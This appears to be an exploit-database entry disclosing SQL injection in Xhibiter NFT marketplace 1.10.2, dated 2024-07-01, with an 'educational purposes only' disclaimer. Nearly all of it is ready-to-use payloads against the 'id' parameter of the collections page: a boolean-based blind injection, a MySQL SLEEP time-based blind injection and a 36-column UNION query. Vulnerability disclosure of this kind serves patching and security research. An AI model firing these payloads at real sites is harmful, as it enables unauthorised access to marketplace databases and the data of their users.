Exploits / Vulnerability Discovered : 2024-07-01 |
Type : webapps |
Platform : php
This exploit / vulnerability Xhibiter nft marketplace 1.10.2 sql injection is for educational purposes only and if it is used you will do on your own risk!
on this dir
https://localhost/collections?id=2
xhibiter nft marketplace suffers from SQLI
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2' AND 4182=4182 AND 'rNfD'='rNfD
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=2' AND (SELECT 1492 FROM (SELECT(SLEEP(5)))HsLV) AND 'KEOa'='KEOa
Type: UNION query
Title: MySQL UNION query (NULL) - 36 columns
Payload: id=2' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162626271,0x655465754c50524d684f764944434458624e4e596c614b6d4a56656f495669466d4b704362666b58,0x71716a6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
---